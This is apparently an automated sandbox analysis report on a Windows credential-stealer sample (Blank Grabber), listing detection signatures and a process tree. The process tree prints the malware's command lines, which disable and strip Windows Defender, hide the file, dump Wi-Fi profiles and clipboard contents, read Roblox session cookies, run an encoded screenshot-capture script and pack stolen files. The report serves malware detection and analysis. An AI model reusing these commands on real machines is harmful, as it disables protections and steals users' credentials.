Edit tour

Windows Analysis Report
driver.exe

Overview

General Information

Sample name:	driver.exe
Analysis ID:	1587410
MD5:	d368f3959b9a9ff30d34004d99676729
SHA1:	21f07b36197be39f6db1cf8ae7d9cb1afc750b48
SHA256:	f86f4f262306edd56ac4e433fd053be687ef96f40c7ad7ddf63aae8ec851c499
Tags:	exeuser-zhuzhu0009
Infos:

Detection

Blank Grabber

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Sigma detected: Capture Wi-Fi password

Yara detected Blank Grabber

Yara detected Telegram RAT

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Bypasses PowerShell execution policy

Encrypted powershell cmdline option found

Found many strings related to Crypto-Wallets (likely being stolen)

Loading BitLocker PowerShell Module

Modifies Windows Defender protection settings

Modifies existing user documents (likely ransomware behavior)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Removes signatures from Windows Defender

Self deletion via cmd or bat file

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Powershell Defender Disable Scan Feature

Sigma detected: Rar Usage with Password and Compression Level

Sigma detected: Suspicious Encoded PowerShell Command Line

Sigma detected: Suspicious Ping/Del Command Combination

Sigma detected: Suspicious PowerShell Encoded Command Patterns

Sigma detected: Suspicious Startup Folder Persistence

Suspicious powershell command line found

Tries to harvest and steal WLAN passwords

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Uses attrib.exe to hide files

Uses netsh to modify the Windows network and firewall settings

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Writes or reads registry keys via WMI

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Compiles C# or VB.Net code

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to shutdown / reboot the system

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates a window with clipboard capturing capabilities

Creates files inside the system directory

Detected non-DNS traffic on DNS port

Detected potential crypto function

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

PE file does not import any functions

Queries disk information (often used to detect virtual machines)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for the Microsoft Outlook file path

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI

Sigma detected: Powershell Defender Exclusion

Sigma detected: SCR File Write Event

Sigma detected: Startup Folder File Write

Sigma detected: Suspicious Execution of Powershell with Base64

Sigma detected: Suspicious Screensaver Binary File Creation

Stores files to the Windows start menu directory

Too many similar processes found

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

driver.exe (PID: 5708 cmdline: "C:\Users\user\Desktop\driver.exe" MD5: D368F3959B9A9FF30D34004D99676729)

driver.exe (PID: 6620 cmdline: "C:\Users\user\Desktop\driver.exe" MD5: D368F3959B9A9FF30D34004D99676729)

cmd.exe (PID: 1472 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\driver.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 2128 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\driver.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 6520 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5652 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)

MpCmdRun.exe (PID: 5588 cmdline: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All MD5: B3676839B2EE96983F9ED735CD044159)

cmd.exe (PID: 6640 cmdline: C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('error 0x1233112x', 0, 'invalid key', 32+16);close()"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

mshta.exe (PID: 5396 cmdline: mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('error 0x1233112x', 0, 'invalid key', 32+16);close()" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)

cmd.exe (PID: 6412 cmdline: C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\Desktop\driver.exe"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

attrib.exe (PID: 6460 cmdline: attrib +h +s "C:\Users\user\Desktop\driver.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)

cmd.exe (PID: 6672 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?? .scr'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 2132 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?? .scr' MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7216 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7496 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 7236 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7512 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 7368 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7504 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7380 cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 7560 cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 7608 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7888 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 7616 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 7832 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 7740 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

netsh.exe (PID: 7868 cmdline: netsh wlan show profile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)

cmd.exe (PID: 7968 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 8156 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 7980 cmdline: C:\Windows\system32\cmd.exe /c "systeminfo" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

systeminfo.exe (PID: 8140 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)

cmd.exe (PID: 8024 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 3560 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA= MD5: 04029E121A0CFA5991749937DD22A1D9)

csc.exe (PID: 7476 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c4gv4hox\c4gv4hox.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

cvtres.exe (PID: 7656 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF5CD.tmp" "c:\Users\user\AppData\Local\Temp\c4gv4hox\CSCF22C8917EB0C431F96BD8AEEEA495758.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

cmd.exe (PID: 7792 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 7772 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 7572 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 5232 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 5448 cmdline: C:\Windows\system32\cmd.exe /c "getmac" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

getmac.exe (PID: 7452 cmdline: getmac MD5: 7D4B72DFF5B8E98DD1351A401E402C33)

cmd.exe (PID: 7424 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 7380 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

SIHClient.exe (PID: 7792 cmdline: C:\Windows\System32\sihclient.exe /cv g+FHZVRhzUydp9rkwD8VSQ.0.2 MD5: 8BE47315BF30475EEECE8E39599E9273)

cmd.exe (PID: 7764 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 7980 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 7484 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7688 cmdline: powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7232 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7640 cmdline: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7972 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe a -r -hp"y" "C:\Users\user\AppData\Local\Temp\Ffb7z.zip" *" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

